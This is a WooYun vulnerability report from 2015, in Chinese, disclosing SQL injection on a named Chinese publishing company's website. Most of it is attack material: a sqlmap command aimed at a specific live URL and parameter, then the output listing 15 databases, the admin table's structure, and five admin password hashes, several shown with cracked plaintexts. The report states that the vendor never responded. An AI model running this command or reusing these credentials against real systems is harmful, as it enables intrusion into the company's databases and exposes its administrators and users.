当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0145563

漏洞标题:中文传媒SQL注射/管理密码暴露/信息疑似泄露/涉及15库

相关厂商:中文传媒

漏洞作者: 冷白开。

提交时间:2015-10-09 18:33

修复时间:2015-11-23 18:34

公开时间:2015-11-23 18:34

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-09: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-11-23: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

中文传媒SQL注射/管理密码暴露/信息疑似泄露/涉及15库

详细说明:

sqlmap.py -u "http://www.600373.net/mainpages/vedio.aspx?LessType=MD102" --dbs

1.png

available databases [15]:
[*] [zwcm_2011(old)]
[*] BookData
[*] BookExport
[*] DownloadBook
[*] HXS
[*] jxpp_2008
[*] jxpp_2012
[*] KCDB_2013
[*] master
[*] model
[*] msdb
[*] NetPerfMon
[*] PublishingResources
[*] tempdb
[*] zwcm_2014
Database: zwcm_2014
[68 tables]
+--------------------------+
| AccessCount              |
| AdminDep_Less            |
| AdminDep_Main            |
| AdminInfo                |
| AdminOperateLog          |
| AdminRole                |
| AdminRole_OtherList      |
| BaseColumn               |
| BaseInfo                 |
| BaseType                 |
| BookBinding              |
| BookCLC                  |
| BookClass                |
| BookComment              |
| BookInfo                 |
| BookInfo_ForeignLanguage |
| BookInfo_Type            |
| BookKind                 |
| BookLanguage             |
| BookPress                |
| BookPress_Type           |
| BookReply                |
| BookSerialize_Chapter    |
| BookSerialize_Section    |
| BookType_Less            |
| BookType_Main            |
| CityInfo                 |
| DBBackup                 |
| ImageInfo                |
| ImageType_Less           |
| ImageType_Main           |
| InviteInfo               |
| InviteInfo_User          |
| LinkInfo                 |
| LinkType                 |
| Magazine                 |
| MagazineInfo             |
| MagazineInfo_E           |
| MagazineInfo_Graph       |
| MagazineInfo_Type        |
| MagazineType_Less        |
| MagazineType_Main        |
| MediaInfo                |
| MediaType                |
| MerchantCollection       |
| MerchantOrder            |
| MerchantOrder_Book       |
| MerchantOrder_Rate       |
| MerchantShopping         |
| MessageInfo              |
| MessageType              |
| NewsAdjunct              |
| NewsInfo                 |
| NewsInfo_Type            |
| NewsReply                |
| NewsType_Less            |
| NewsType_Main            |
| PeopleInfo               |
| PeopleType               |
| RssNews                  |
| RssNews_Type             |
| RssType_Less             |
| RssType_Main             |
| UserGold_Supply          |
| UserInfo                 |
| UserType                 |
| VoteInfo                 |
| VoteType                 |
+--------------------------+
Database: zwcm_2014
Table: AdminInfo
[13 columns]
+----------------+----------+
| Column         | Type     |
+----------------+----------+
| AdminDepment   | nvarchar |
| AdminEndDate   | datetime |
| AdminID        | nvarchar |
| AdminName      | nvarchar |
| AdminPass      | nvarchar |
| AdminRole      | nvarchar |
| AdminVerify    | nvarchar |
| ID             | int      |
| IFForEver      | int      |
| IFLocked       | int      |
| LastOnlineDate | datetime |
| LockEndDate    | datetime |
| RegisterDate   | datetime |
+----------------+----------+
Database: zwcm_2014
Table: AdminInfo
[5 entries]
+-------------------------------------------+
| AdminPass                                 |
+-------------------------------------------+
| 0a424597916704e0e84c7fcde50a9a7d          |
| ab65df7928af8f15c71eeb3ff1363029          |
| ce8b4367aa4f8057dc8f20c65db45437 (810520) |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| f379eaf3c831b04de153469d1bec345e (666666) |
+-------------------------------------------+

漏洞证明:

综上

修复方案:

你们懂

版权声明:转载请注明来源 冷白开。@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝